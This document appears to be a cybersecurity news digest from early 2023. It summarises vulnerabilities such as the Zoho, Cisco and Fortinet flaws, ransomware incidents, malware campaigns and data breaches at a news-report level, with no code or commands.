    Bitwarden and other password managers are being targeted in Google ads phishing campaigns to steal users' password vault credentials. As the enterprise and consumers move to use unique passwords at every site, it has become essential to use password managers to keep track of all the passwords. However, unless you use a local password manager, like KeePass, most password managers are cloud-based, allowing users to access their passwords through websites and mobile apps. These passwords are stored in the cloud in "password vaults" that keep the data in an encrypted format, usually encrypted using users' master passwords.

    Lexmark Warns of RCE Bug Affecting 100 Printer Models, POC Released

    Lexmark has released a security firmware update to fix a severe vulnerability that could enable remote code execution (RCE) on more than 100 printer models. The security issue is tracked as CVE-2023-23560 and, according to the company, it has a severity rating of 9.0. It is a server-side request forgery (SSRF) in the Web Services feature of Lexmark devices.

    Hive Ransomware Dark Web Sites Seized by Law Enforcement

    Today, the Hive ransomware Tor payment and data leak sites were seized as part of an international law enforcement operation involving the US Department of Justice, FBI, Secret Service, Europol, and Germany's BKA and Polizei. The seizure notice on the Tor sites also lists a wide range of other countries involved in the law enforcement operation, including Canada, France, Lithuania, Netherlands, Norway, Portugal, Romania, Spain, Sweden, and the United Kingdom. Unlike previous seizure messages used by law enforcement, this image is an animated GIF rotating between a message in English and Russian, likely to be a warning for other ransomware gangs.

    Exploit Released for Critical Windows CryptoAPI Spoofing Bug

    Researchers at Akamai published proof-of-concept exploit code for a critical Windows CryptoAPI vulnerability (CVE-2022-34689) discovered by the NSA and U.K.'s NCSC allowing MD5-collision certificate spoofing. “CryptoAPI is the de facto API in Windows for handling anything related to cryptography. In particular, it handles certificates — from reading and parsing them to validating them against verified certificate authorities (CAs). Browsers also use CryptoAPI for TLS certificate validation — a process that results in the lock icon everyone is taught to check.”

    CISA: Federal Agencies Hacked Using Legitimate Remote Desktop Tools in Callback Attacks.

    The IT-ISAC distributed an attachment in our daily report yesterday detailing how threat actors currently use RMM (Remote Monitoring and Management) tools for malicious purposes. CISA discovered malicious activity within the networks of multiple federal civilian executive branch (FCEB) agencies using the EINSTEIN intrusion detection system after releasing a Silent Push report in mid-October 2022.

    Experts Warn of a Surge of Attacks Exploiting a Realtek Jungle SDK RCE (CVE-2021-35394)

    Palo Alto Networks researchers reported that between August and October 2022 the number of attacks that attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394) (CVSS score 9.8) accounted for more than 40% of the total number of attacks (Security Affairs, 2023). “Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.” reads the description for this flaw.

    Zacks Investment Research Data Breach Affects 820,000 Clients

    Zacks, an investment research company, fell victim to a data breach last year. On December 28, 2022, Zacks learned that an unknown third party had gained unauthorized access to customer records. Zacks is one of the largest providers of independent stock, ETF, and mutual fund research in the United States. Their services include aiding investors with stock buying decisions using financial data analytics. The data breach affected 820,000 users. The specific dataset that was taken consisted of Zacks Elite customers who joined between November 1999 and February 2005. The information included in the data set consists of names, addresses, phone numbers, email addresses, and passwords used for Zacks.com. The research firm has found no evidence that any financial data was stolen.

    Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

    Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most powerful of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the user's privileges, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those with administrative user rights.

    Ransomware Access Brokers Use Google Ads to Breach Your Network

    Researchers have discovered a new malicious advertising campaign attributed to DEV-0569. The campaign utilizes Google Ads to spread malware, steal passwords, and breach networks for ransomware attacks. "Over the past couple of weeks, cybersecurity researchers MalwareHunterTeam, Germán Fernández, and Will Dormann have illustrated how Google search results have become a hotbed of malicious advertisements pushing malware. These ads pretend to be websites for popular software programs, like LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC."

    VMware Fixes Critical Security Bugs in vRealize Log Analysis Tool

    On Tuesday, VMware addressed several vulnerabilities impacting its vRealize Log Insight, a log analysis and management tool. Two of the flaws have been rated critical in severity (CVSS: 9.8) and are tracked as CVE-2022-31703 and CVE-2022-31704. CVE-2022-31703 is a directory traversal vulnerability that can be leveraged for remote code execution (RCE) by injecting files into the operating system of impacted appliances. The other critical flaw, CVE-2022-31704, is a broken access control bug which can also be abused for RCE using a similar method.

    North Korean Hackers Turn to Credential Harvesting in Latest Wave of Cyberattacks

    A North Korean nation-state group notorious for crypto heists has been attributed to a new wave of malicious email attacks as part of a "sprawling" credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy. The state-aligned threat actor is being tracked by Proofpoint under the name TA444, and by the larger cybersecurity community as APT38, BlueNoroff, Copernicium, and Stardust Chollima. TA444 is ‘utilizing a wider variety of delivery methods and payloads alongside blockchain-related lures, fake job opportunities at prestigious firms, and salary adjustments to ensnare victims,’ the enterprise security firm said in a report.

    Apple Fixes Actively Exploited iOS Zero-Day on Older iPhones, iPads

    Apple recently backported fixes for older iPhones and iPads to address a remotely exploitable zero-day vulnerability that was disclosed last month. Tracked as CVE-2022-42856, the vulnerability is related to a type confusion weakness in Apple’s WebKit web browsing engine. A malicious actor can exploit the weakness to perform arbitrary code execution by tricking victims into visiting a maliciously crafted website under the attacker’s control.

    Emotet Malware Makes a Comeback with New Evasion Techniques

    The Emotet malware operation has continued to refine its tactics in an effort to fly under the radar, while also acting as a conduit for other dangerous malware such as Bumblebee and IcedID. Attributed to a cybercrime group tracked as TA542 (aka Gold Crestwood or Mummy Spider), the virus has evolved from a banking trojan to a malware distributor since its first appearance in 2014. The malware-as-a-service (MaaS) is also modular, capable of deploying an array of proprietary and freeware components that can exfiltrate sensitive information from compromised machines and carry out other post-exploitation activities.

    Hackers Use Golang Source Code Interpreter to Evade Detection

    Researchers have observed a Chinese-speaking hacking group dubbed DragonSpark. The attacks are tracked by SentinelLabs, whose researchers report that DragonSpark relies on a little-known open-source tool called SparkRAT to steal sensitive data from compromised systems, execute commands, perform lateral network movement, and more. The threat actors leverage compromised infrastructure in China, Taiwan, and Singapore to launch their attacks, while the intrusion vector observed by SentinelLabs is vulnerable MySQL database servers exposed online.

    CISA added Zoho ManageEngine RCE (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog

    We reported on this vulnerability throughout the last couple of weeks and urged companies to ensure that they’re patched, as a POC was set to be released. CISA added the Zoho ManageEngine remote code execution flaw (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog. CVE-2022-47966 allows attackers to execute code remotely on vulnerable products without authentication. The bug impacts multiple Zoho products where SAML SSO is enabled in the ManageEngine configuration. The issue also affects products that had the feature enabled in the past. The company addressed the vulnerability on October 27, 2022.

    FanDuel Warns of Data Breach After Customer Info Stolen in Vendor Hack

    The FanDuel sportsbook and betting site is warning customers that their names and email addresses were exposed in a January 2023 MailChimp security breach, urging users to remain vigilant against phishing emails. On January 13th, MailChimp confirmed they suffered a breach after hackers stole an employee's credentials using a social engineering attack. Using these credentials, the threat actors accessed an internal MailChimp customer support and administration tool to steal the "audience data" for 133 customers.

    Over 19,000 End-of-life Cisco Routers Exposed to RCE Attacks

    Over 19,000 end-of-life Cisco VPN routers on the Internet are exposed to attacks targeting a remote command execution exploit chain. By chaining two security flaws disclosed last week, threat actors can bypass authentication (CVE-2023-20025) and execute arbitrary commands (CVE-2023-2002) on the underlying operating system of Cisco Small Business RV016, RV042, RV042G, and RV082 routers.

    New Boldmove Linux Malware Used to Backdoor Fortinet Devices

    Last month, Fortinet disclosed a vulnerability in FortiOS SSL-VPN, warning customers to patch their appliances as attackers were observed exploiting it in the wild. The vulnerability, tracked as CVE-2022-42475, relates to a heap-based buffer overflow in FortiOS SSL-VPN which could enable unauthenticated threat actors to execute arbitrary code and commands via specifically crafted requests. Fortinet silently fixed the bug in November, but didn’t publicly disclose details of the vulnerability until December. At the time, the company stated that it was aware of active exploitation of this flaw, but no further details were provided. Recently, Mandiant released a blog post stating that suspected Chinese hackers exploited the flaw as a zero-day in December to target a European government and an African MSP and deploy a custom malware, dubbed Boldmove.

    Riot Games Hacked, Delays Game Patches After Security Breach

    The video game developer Riot Games, recognized for publishing games such as League of Legends and Valorant, has been hacked. "The LA-based game publisher disclosed the incident in a Twitter thread on Friday night and promised to keep customers up-to-date with whatever an ongoing investigation discovers." (Bleeping Computer, 2023). The company has stated that its development environment was the victim of a social engineering attack. Multiple development teams have confirmed the security breach, including the League of Legends development team and Teamfight Tactics. However, there has been no indication that player data or personal information was compromised. One consequence of the attack is that Riot Games will be unable to release content on schedule, leading to delays in the anticipated release date of the next major patch. The company's head of studio released a statement explaining that there will be no changes in the release plan of Patch 13.2; however, aspects of Patch 13.2 may be moved to Patch 13.3, which debuts on February 8. The League team is attempting to hotfix what it can to deliver the planned and tested balance changes on time.

    Roaming Mantis’ Android Malware Adds DNS Changer to Hack Wi-Fi Routers

    The Roaming Mantis malware distribution campaign has updated its Android malware to include a DNS changer that modifies DNS settings on vulnerable Wi-Fi routers to spread the infection to other devices. Starting in September 2022, researchers observed the 'Roaming Mantis' credential theft and malware distribution campaign using a new version of the Wroba.o/XLoader Android malware that detects vulnerable Wi-Fi routers based on their model and changes their DNS. The malware then creates an HTTP request to hijack a vulnerable Wi-Fi router's DNS settings, causing connected devices to be rerouted to malicious web pages hosting phishing forms or dropping Android malware.

    Ransomware Gang Steals Data From KFC, Taco Bell, and Pizza Hut Brand Owner

    Yum! Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom. Yum! Brands operates 53,000 restaurants across 155 countries and territories, with over $5 billion in total assets and $1.3 billion in yearly net profit.

    New 'Hook' Android Malware Lets Hackers Remotely Control Your Phone

    A new Android malware named 'Hook' is being sold by cybercriminals, boasting it can remotely take over mobile devices in real-time using VNC (virtual network computing). The new malware is promoted by the creator of Ermac, an Android banking trojan selling for $5,000/month that helps threat actors steal credentials from over 467 banking and crypto apps via overlaid login pages. While the author of Hook claims the new malware was written from scratch, and despite having several additional features compared to Ermac, researchers at ThreatFabric dispute these claims and report seeing extensive code overlaps between the two families. ThreatFabric explains that Hook contains most of Ermac's code base, so it's still a banking trojan. At the same time, it includes several unnecessary parts found in the older strain that indicate it re-used code in bulk.

    Google Ads Increasingly Pointing to Malware

    The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software, an old tactic that has lately resulted in far too many malicious ads served to users searching for software, cracked software, drivers, or anything else that can be downloaded, via Google and Bing. Recently there has been a noticeable uptick in malicious ads being served by popular search engines. Mimicking popular open source tools via typosquatted domains, threat actors are luring victims into search engine ad links. HP threat researcher Patrick Schläpfer says that they have seen “a significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique.”

    New ‘Blank Image’ Attack Hides Phishing Scripts in SVG Files

    Researchers identified a new phishing campaign known as “Blank Image”. The blank image attack was observed in the wild, where the technique used was to conceal empty SVG files inside HTML attachments impersonating DocuSign documents. The phishing email is sent to prospective victims as a document from DocuSign. Next, the recipient is prompted to review and sign the document named "Scanned Remittance Advice[.]htm". If the receiver chooses the "View Completed Document" option, they are directed to a legitimate DocuSign webpage. However, if the user opens the HTML attachment, the ‘Blank Image’ attack commences.

    T-Mobile Hacked to Steal Data of 37 Million Accounts in API Data Breach

    T-Mobile disclosed a new data breach after a threat actor stole the personal information of 37 million current postpaid and prepaid customer accounts through one of its Application Programming Interfaces (APIs). While T-Mobile did not share how their API was exploited, threat actors commonly find flaws that allow them to retrieve data without authenticating first.

    Ukraine Links Data-Wiping Attack on News Agency to Russian Hackers

    Ukraine’s Computer Emergency Response Team recently linked a cyberattack targeting the country’s national news agency (Ukrinform) to Sandworm, a group of Russian military hackers. It is currently unknown how the attackers breached the news agency’s network. However, after gaining an initial foothold, CaddyWiper, a destructive wiper malware, was launched onto the agency’s systems via Windows group policy (GPO). CERT-UA notes this type of attack chain is similar to that of Sandworm, whose activities are linked to the Russian Federation. In April 2022, Sandworm was observed using CaddyWiper against a large Ukrainian energy provider.

    A Couple of Bugs Can be Chained to Hack Netcomm Routers

    The vulnerabilities discovered in the Netcomm routers are a stack-based buffer overflow and an authentication bypass, respectively tracked as CVE-2022-4873 and CVE-2022-4874. Both issues impact the Netcomm router models NF20MESH, NF20, and NL1902 running software versions earlier than R6B035.

    Illegal Solaris Darknet Market Hijacked by Competitor Kraken

    Solaris, a large darknet marketplace focused on drugs and illegal substances, has been taken over by a smaller competitor named 'Kraken,' who claims to have hacked it on January 13, 2022. The Tor site of Solaris currently redirects to Kraken, while blockchain monitoring experts at Elliptic report no movements in the cryptocurrency addresses associated with the site after January 13, 2022.

    Avast Releases Free BianLian Ransomware Decryptor

    Avast has released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers for a decryption key. The availability of a decryptor comes only about half a year after increased activity from BianLian ransomware over the summer of 2022 when the threat group breached multiple high-profile organizations.

    1,000 Ships Impacted by a Ransomware Attack on Maritime Software Supplier DNV

    About 1,000 vessels have been impacted by a ransomware attack against DNV, one of the major maritime software suppliers. DNV GL provides solutions and services throughout the life cycle of any vessel, from design and engineering to risk assessment and ship management. The Norwegian company provides services for 13,175 vessels and mobile offshore units (MOUs) amounting to 265.4 million gross tonnes, which represents a global market share of 21%.

    Over 4,000 Sophos Firewall Devices Vulnerable to RCE Attacks

    In September 2022, Sophos released an advisory warning its customers of a critical remote code execution vulnerability (CVE-2022-3236) impacting its Sophos Firewall Webadmin and User Portal HTTP interfaces. Hotfixes were released in September for the impacted Firewall versions (v19.0 MR1 (19.0.1) and older), with official fixes being issued three months later in December 2022. According to a new report by VulnCheck vulnerability researcher Jacob Baines, out of more than 88,000 instances, around 6% or more than 4,000 are still running versions that haven't received a hotfix and are vulnerable to CVE-2022-3236 attacks.

    Iranian Government Entities Under Attack by New Wave of BackdoorDiplomacy Attacks

    The threat actor known as BackdoorDiplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022. Palo Alto Networks Unit 42, which is tracking the activity under its constellation-themed moniker Playful Taurus, said it observed the government domains attempting to connect to malware infrastructure previously identified as associated with the adversary. Also known by the names APT15, KeChang, NICKEL, and Vixen Panda, the Chinese APT group has a history of cyber espionage campaigns aimed at government and diplomatic entities across North America, South America, Africa, and the Middle East at least since 2010.

    SecurityScorecard: Almost Half of Critical Manufacturing at Risk of Breach

    According to new research from SecurityScorecard titled “Addressing the Trust Deficit In Critical Infrastructure”, published on January 18, 2023, nearly half (48%) of critical manufacturing organizations are vulnerable to a breach. The report analyzed the current state of cyber resilience in the critical infrastructure sectors such as energy, chemical, healthcare, and others, as designated by the Cybersecurity and Infrastructure Security Agency (CISA). As part of the report, the 48% of the organizations analyzed received a rating of “C”, “D” or “F” on SecurityScorecard’s security ratings platform. SecurityScorecard says organizations with an “A” rating are 7.7 times less likely to sustain a breach than those with an “F” rating.

    Malware Attack on CircleCI Engineer's Laptop Leads to Recent Security Incident

    On Friday, DevOps platform CircleCI disclosed that one of its engineers became infected with an info-stealing malware capable of stealing two-factor authentication-backed credentials, enabling threat actors to breach the company’s systems and data. CircleCI says the attack took place on December 16, 2022, and that the malware was able to go undetected by its antivirus software. According to CircleCI’s chief technology officer, Rob Zuber, the malware was able to execute session cookie theft, enabling the attackers to impersonate the targeted employee from a remote location, and then escalate access to a subset of the company’s production systems. From here, the threat actors used the elevated privileges to steal data from the company’s database, which included customer environment variables, tokens, and keys. Although the stolen data was encrypted at rest, Zuber stated that the actors extracted encryption keys from a running process, enabling them to potentially access the encrypted data.

    Hackers Exploit Cacti Critical Bug to Install Malware, Open Reverse Shells

    In early December 2022, a security advisory warned of a critical command injection vulnerability (tracked as CVE-2022-46169, severity rating 9.8 out of 10) in Cacti that could be exploited without authentication. Cacti is an operational and fault management monitoring solution for network devices that also provides graphical visualization. There are thousands of instances deployed across the world exposed on the web (Bleeping Computer, 2023). Although the developer released an update for the flaw, there are currently more than 1,600 instances vulnerable to CVE-2022-46169 that hackers have already started to exploit.

    Fortinet Observed Three Rogue PyPI Packages Spreading Malware

    Researchers at Fortinet recently discovered three malicious PyPI packages on January 10, 2023. These three packages are named “colorslib”, “httpslib”, and “libhttps”. All three packages were uploaded by the same actor and have been downloaded a total of 550 times. The packages include complete descriptions, and they do not mimic the names of other projects; because of this, developers are deceived into believing these packages are general resources with risk-free code. Nevertheless, the packages are capable of dropping info-stealing malware on developer systems.

    T95 Android TV Box Sold on Amazon Hides Sophisticated Malware

    Security researcher Daniel Milisic discovered that the T95 Android TV box he purchased on Amazon was infected with sophisticated pre-installed malware. This Android TV box model is available on Amazon and AliExpress for as low as $40. The device came with Android 10 (with a working Play Store) and an Allwinner H616 processor. Milisic purchased the T95 Android TV box to run Pi-hole, which is a Linux network-level advertisement and Internet tracker blocking application.

    Researchers to Release POC Exploit for Critical Zoho RCE Bug, Patch Now

    On Friday, security researchers with Horizon3's Attack Team warned admins that they had created a proof-of-concept (POC) exploit for CVE-2022-47966. According to the researchers, the vulnerability could be leveraged in 'spray and pray' attacks across the internet, since it allows remote code execution as NT AUTHORITY\SYSTEM, which essentially gives an attacker complete control over the system. Vulnerable software versions include almost all ManageEngine products. Fortunately, Zoho has already patched the bugs in waves, starting on October 27, 2022, by updating third-party modules to a more recent version.

    IcedID Malware Strikes Again: Active Directory Domain Compromised in Under 24 Hours

    A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access, while also borrowing techniques from other groups like Conti to meet its goals. ‘Throughout the attack, the attacker followed a routine of recon commands, credential theft, lateral movement by abusing Windows protocols, and executing Cobalt Strike on the newly compromised host,’ Cybereason researchers said in a report published this week.

    Microsoft: Cuba Ransomware Hacking Exchange Servers via OWASSRF Flaw

    Microsoft says Cuba ransomware threat actors are hacking Microsoft Exchange servers unpatched against a critical server-side request forgery (SSRF) vulnerability also exploited in Play ransomware attacks. Cloud computing provider Rackspace recently confirmed that Play ransomware used a zero-day exploit dubbed OWASSRF targeting this bug (CVE-2022-41080) to compromise unpatched Microsoft Exchange servers on its network after bypassing ProxyNotShell URL rewrite mitigations. According to Microsoft, the Play ransomware gang has abused this security flaw since late November 2022. The company advises customers to prioritize CVE-2022-41080 patching to block potential attacks. Redmond says that this SSRF vulnerability has also been exploited since at least November 17th by another threat group it tracks as DEV-0671 to hack Exchange servers and deploy Cuba ransomware payloads.

    RAT Malware Campaign Tries to Evade Detection Using Polyglot Files

    Operators of the StrRAT and Ratty remote access trojans (RAT) are running a new campaign using polyglot MSI/JAR and CAB/JAR files to evade detection from security tools. The campaign was spotted by Deep Instinct, which reports that the threat actors achieve moderate success in evading detection by anti-virus engines. This is notable considering how old and well-documented the two particular RATs are.

    Hackers Exploit Control Web Panel Flaw to Open Reverse Shells

    A recently patched vulnerability in Control Web Panel (CWP), a tool for managing servers formerly known as CentOS Web Panel, is being leveraged in cyberattacks. The security vulnerability in question is identified as CVE-2022-44877, which received a critical severity score of 9.8 out of 10. An attacker could execute code remotely without authentication on unpatched instances. On January 3rd, researcher Numan Türle at Gais Cyber Security, who initially reported the issue around October last year, published a proof-of-concept (POC) exploit with a video demonstrating how the exploit works. Only three days after the release of the POC, security researchers noticed hackers using the flaw to get remote access to unpatched systems and to find more vulnerable machines.

    Royal Mail Cyberattack Linked to LockBit Ransomware Operation

    Royal Mail, the UK's largest mail delivery service, disclosed yesterday that it suffered and is recovering from a callous cyber attack. Attribution was initially unknown; however, today, reports suggest that the LockBit ransomware operators are responsible for the attack that left the organization's computer systems unusable. As a result, the company's shipping and logistics services were suspended, severely halting business operations. “Royal Mail is experiencing severe service disruption to our international export services following a cyber incident," disclosed Royal Mail in its service update.

    Cisco Warns of Auth Bypass Bug With Public Exploit in EoL Routers

    On Wednesday, Cisco published an advisory to warn customers of several vulnerabilities impacting its end-of-life VPN routers. The first flaw, which is being tracked as CVE-2023-20025 (CVSS score: 9.0), is related to an authentication bypass vulnerability in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082 Routers. Cisco says the flaw is due to improper validation of user input within incoming HTTP packets and can be exploited by sending specially crafted HTTP requests to the web-based management interface. Upon successful exploitation, a malicious threat actor could bypass authentication and gain root access to the targeted system.

    New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors

    A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat. Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is a malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities. Given its use by multiple threat actors to drop a wide range of payloads such as SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it's believed to be a pay-per-install (PPI) botnet capable of serving next-stage malware.

    Aflac, Zurich Policyholders in Japan Affected by Data Leaks

    Personal information for more than 1.3 million Aflac cancer insurance and almost 760,000 Zurich Insurance auto insurance policyholders is on the dark web following a hack on a third-party contractor. Neither company named the data leak site or third-party vendor involved with its breach, so it is unclear if the two incidents are related. Affected individuals from both hacks reside in Japan. "The incident, caused by a vulnerability in a file transfer server, originated with a subcontractor of a third-party vendor that Aflac Japan uses for marketing purposes. The data, which did not include personally identifiable information, was posted on a dark website. This incident was confined to Aflac Japan and did not involve data related to U.S. operations or customers."

    Scattered Spider Hackers Use Old Intel Driver to Bypass Security

    CrowdStrike reports that the Scattered Spider threat actor was seen attempting to exploit CVE-2015-2291, a high-severity vulnerability in the Intel Ethernet diagnostics driver that allows an attacker to execute arbitrary code with kernel privileges using specially crafted calls. Although the aforementioned CVE was fixed in 2015, by planting an older, still vulnerable version on the breached devices, the threat actors can leverage the flaw no matter what updates the victim has applied to the system.

    Gootkit Malware Abuses VLC to Infect Healthcare Orgs with Cobalt Strike

    The Gootkit loader malware operators are running a new SEO poisoning campaign that abuses VLC Media Player to infect Australian healthcare entities with Cobalt Strike beacons. The campaign's goal is to deploy the Cobalt Strike post-exploitation toolkit on infected devices for initial access to corporate networks. From there, the remote operators can perform network scans, move laterally throughout the network, steal account credentials and files, and deploy more dangerous payloads such as ransomware.

    New Dark Pink APT Group Targets Govt and Military With Custom Malware

    Attacks targeting government agencies and military bodies in multiple countries in the APAC region have been attributed to what appears to be a new advanced threat actor that leverages custom malware to steal confidential information. Security researchers are referring to this group as Dark Pink (Group-IB) or Saaiwc Group (Anheng Hunting Labs), noting that it employs uncommon tactics, techniques, and procedures.

    Lorenz Ransomware Gang Plants Backdoors to Use Months Later

    Security researchers are warning that patching critical vulnerabilities allowing access to the network is insufficient to defend against ransomware attacks. Some gangs are exploiting the flaws to plant a backdoor while the window of opportunity exists and may return long after the victim has applied the necessary security updates. One case is a Lorenz ransomware attack that reached completion months after the hackers gained access to the victim's network using an exploit for a critical bug in a telephony system. During an incident response engagement for a Lorenz ransomware attack, researchers at global intelligence and cyber security consulting company S-RM determined that the hackers had breached the victim network five months before starting to move laterally, steal data, and encrypt systems.

    Microsoft January 2023 Patch Tuesday fixes 98 flaws, 1 Zero-Day

    As part of the January 2023 Patch Tuesday, Microsoft addressed 98 flaws, including a zero-day that is actively being exploited in attacks. Of the 98 flaws fixed, there were 39 Elevation of Privilege Vulnerabilities, 4 Security Feature Bypass Vulnerabilities, 33 Remote Code Execution Vulnerabilities, 10 Information Disclosure Vulnerabilities, 10 Denial of Service Vulnerabilities, and 2 Spoofing Vulnerabilities. 11 of the vulnerabilities are rated critical in severity, most of which relate to remote code execution and privilege escalation.

    StrongPity Hackers Target Android Users via Trojanized Telegram App

    The StrongPity APT hacking group is distributing a fake Shagle chat app that is a trojanized version of the Telegram for Android app with an added backdoor. Shagle is a legitimate random-video-chat platform allowing strangers to talk via an encrypted communications channel. However, the platform is entirely web-based and does not offer a mobile app (Bleeping Computer, 2023). Since 2021, StrongPity has been using a fake website to impersonate the actual Shagle website, with the goal of tricking victims into downloading a malicious Android application. The malicious app can be used by the attacker to conduct espionage on targeted victims, including monitoring phone calls, collecting SMS text messages, and grabbing their contact lists for continued attacks. StrongPity, also known as Promethium or APT-C-41, has used trojanized applications in previous campaigns, including malicious versions of Notepad++, WinRAR, and TrueCrypt.

    Auth0 Fixes RCE Flaw in JsonWebToken Library Used by 22,000 Projects

    Auth0 fixed a remote code execution vulnerability in the immensely popular 'JsonWebToken' open-source library used by over 22,000 projects and downloaded over 36 million times per month on NPM. The library is used in open source projects created by Microsoft, Twilio, Salesforce, Intuit, Box, IBM, Docusign, Slack, SAP, and many more.

    Microsoft: Kubernetes Clusters Hacked in Malware Campaign via PostgreSQL

    It’s been reported that the Kinsing malware is now actively breaching Kubernetes clusters by leveraging known weaknesses in container images and misconfigured, exposed PostgreSQL containers. While these tactics aren't novel, Microsoft's Defender for Cloud team reports they have seen an uptick lately, indicating that the threat actors are actively looking for specific entry points.

    GitHub Makes It Easier to Scan Your Code for Vulnerabilities

    GitHub has introduced a new option to set up code scanning for a repository known as "default setup," designed to help developers configure it automatically with just a few clicks. While the CodeQL code analysis engine, which powers GitHub's code scanning, comes with support for many languages and compilers, the new option only shows up for Python, JavaScript, and Ruby repositories. Product marketing manager Walker Chabbott said that GitHub is working on expanding support to more languages over the next six months.

    Microsoft Ends Windows 7 Extended Security Updates on Tuesday

    Windows 7 Professional and Enterprise editions will no longer receive extended security updates for critical and important vulnerabilities starting Tuesday, January 10, 2023. Microsoft launched the legacy operating system in October 2009. It then reached its end of support in January 2015 and its extended end of support in January 2020. The Extended Security Update (ESU) program was the last resort option for customers who still needed to run legacy Microsoft products past their end of support on Windows 7 systems.

    Hackers Push Fake Pokemon NFT Game to Take Over Windows Devices

    Threat actors are using a well-crafted Pokemon NFT card game website to distribute the NetSupport remote access tool and take control over victims' devices. The website "pokemon-go[.]io," which is still online at the time of writing, claims to be home to a new NFT card game built around the Pokemon franchise, offering users strategic fun together with NFT investment profits.

    Zoom Users At Risk In Latest Malware Campaign

    Cyble Research & Intelligence Labs (CRIL) recently identified a phishing campaign targeting Zoom application software to deliver the IcedID malware. IcedID, also known as BokBot, is a banking trojan that enables attackers to steal victims’ banking credentials. This malware primarily targets businesses and can be used to steal payment information. In addition, IcedID acts as a loader, allowing it to deliver other malware families or download additional modules. IcedID usually spreads via spam emails with malicious Office file attachments. However, in this campaign, the attackers employed a phishing website to deliver the IcedID payload, which is not a typical distribution method for IcedID. The TAs behind this campaign used a highly convincing phishing page that looked like a legitimate Zoom website to trick users into downloading the IcedID malware, which carries out malicious activities.

    Russian Turla Hackers Hijack Decade-Old Malware Infrastructure to Deploy New Backdoors

    The Russian cyberespionage group known as Turla has been observed piggybacking on attack infrastructure used by a decade-old malware to deliver its own reconnaissance and backdoor tools to targets in Ukraine. Google-owned Mandiant, which is tracking the operation under the uncategorized cluster moniker UNC4210, said the hijacked servers correspond to a variant of a commodity malware called ANDROMEDA (aka Gamarue) that was uploaded to VirusTotal in 2013. ‘UNC4210 re-registered at least three expired ANDROMEDA command-and-control (C2) domains and began profiling victims to selectively deploy KOPILUWAK and QUIETCANARY in September 2022,’ Mandiant researchers said in an analysis published last week.

    Bitdefender Releases Free MegaCortex Ransomware Decryptor

    Antivirus company Bitdefender has released a decryptor for the MegaCortex ransomware family, making it possible for victims of the once notorious gang to restore their data for free. The creation of the decryptor was the combined work of Bitdefender analysts and experts from Europol, the NoMoreRansom Project, and the Zürich Public Prosecutor's Office and Cantonal Police. Using the decryptor is pretty straightforward, as it's a standalone executable that doesn't require installation and offers to locate encrypted files on the system automatically. Moreover, the decryptor can back up the encrypted files for safety in case something goes wrong in the decryption process that could corrupt the files beyond recovery. Also, for those who attempted to decrypt their files previously with mixed success, the new decryptor offers an advanced setting to replace them with clean files.

    Rackspace: Customer Email Data Accessed in Ransomware Attack

    Rackspace revealed on Thursday that attackers behind last month's incident accessed some of its customers' Personal Storage Table (PST) files which can contain a wide range of information, including emails, calendar data, contacts, and tasks. This update comes after Rackspace confirmed that the Play ransomware operation was behind the cyberattack that took down its hosted Microsoft Exchange environment in December. As discovered during the now-finished investigation led by cybersecurity firm Crowdstrike, the attackers gained access to the personal storage folders of 27 Rackspace customers.

    Hackers Abuse Windows Error Reporting Tool to Deploy Malware

    Hackers are abusing the Windows Problem Reporting (WerFault.exe) error reporting tool for Windows to load malware into a compromised system's memory using a DLL sideloading technique. This Windows executable is used to stealthily infect devices without raising any alarms on the breached system, because the malware is launched through a legitimate Windows binary. The new campaign was spotted by K7 Security Labs, which could not identify the hackers, though they are believed to be based in China.

    Zoho Warns About Critical Security Flaw Detected in ManageEngine Products

    Zoho, a business software provider, released a security advisory encouraging its customers to patch a critical security flaw affecting three ManageEngine products immediately, BleepingComputer reports. The SQL injection vulnerability, CVE-2022-47523, was found in Zoho's PAM360 privileged access management software, Password Manager Pro secure vault, and Access Manager Plus privileged session management solution.

    SpyNote Android Malware Infections Surge After Source Code Leak

    During the final quarter of 2021, researchers noted an increase in detections for SpyNote (SpyMax), an Android malware with spying capabilities. The increase in SpyNote infections is likely the result of a source code leak of another piece of malware called CypherRat. “CypherRat combined SpyNote's spying capabilities, such as offering remote access, GPS tracking, and device status and activity updates, with banking trojan features that impersonate banking institutions to steal account credentials” (Bleeping Computer, 2022). CypherRat was sold on private Telegram channels over the second half of 2021, but the author of the malware decided to publish the malware's source code to GitHub. Other threat actors have now leveraged the available source code to launch their own campaigns.

    Hackers Use CAPTCHA Bypass to Make 20K Github Accounts in a Month

    A threat actor group out of South Africa known as 'Automated Libra' has been improving its techniques to make a profit by using cloud platform resources for cryptocurrency mining. According to Palo Alto Networks Unit 42, the threat actors use a new CAPTCHA solving system, follow a more aggressive use of CPU resources for mining, and mix 'freejacking' with the "Play and Run" technique to abuse free cloud resources.

